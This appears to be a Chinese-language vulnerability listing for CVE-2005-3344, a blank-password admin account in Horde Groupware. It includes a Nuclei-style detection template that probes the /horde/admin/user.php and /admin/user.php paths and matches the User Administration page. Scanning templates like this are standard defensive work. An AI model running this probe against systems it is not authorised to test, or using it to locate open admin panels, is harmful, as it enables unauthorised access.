CVE-2005-3344: Horde Groupware Unauthenticated Admin Access

日期: 2025-08-01 | 影响软件: Horde Groupware | POC: 已公开

漏洞描述

Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.

PoC代码[已公开]

id: CVE-2005-3344

info:
  name: Horde Groupware Unauthenticated Admin Access
  author: pikpikcu
  severity: critical
  description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.
  impact: |
    An attacker can gain unauthorized access to sensitive administrative functions and potentially compromise the entire system.
  remediation: |
    Apply the latest security patches or upgrade to a patched version of Horde Groupware to fix the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2005-3344
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3344
    - http://www.debian.org/security/2005/dsa-884
    - http://www.networkscanning.com/Horde-Default-Admin-Password-Vulnerability-VSS_20171.html
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/24576
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
    cvss-score: 10
    cve-id: CVE-2005-3344
    cwe-id: NVD-CWE-Other
    epss-score: 0.1015
    epss-percentile: 0.92839
    cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: horde
    product: horde
  tags: cve2005,cve,horde,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/horde/admin/user.php"
      - "{{BaseURL}}/admin/user.php"

    headers:
      Content-Type: text/html

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<title>Horde :: User Administration</title>"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100977afcb25fc411d3ebec57eb3884a8054f774f12dd6bac9c230527f46760f0370221009ec52ea71ccce56d78fb3c0aeeefce5aed6f0ae4b02459c92c4f57dc301ecac1:922c64590222798bb761d5b6d8e72950

相关漏洞推荐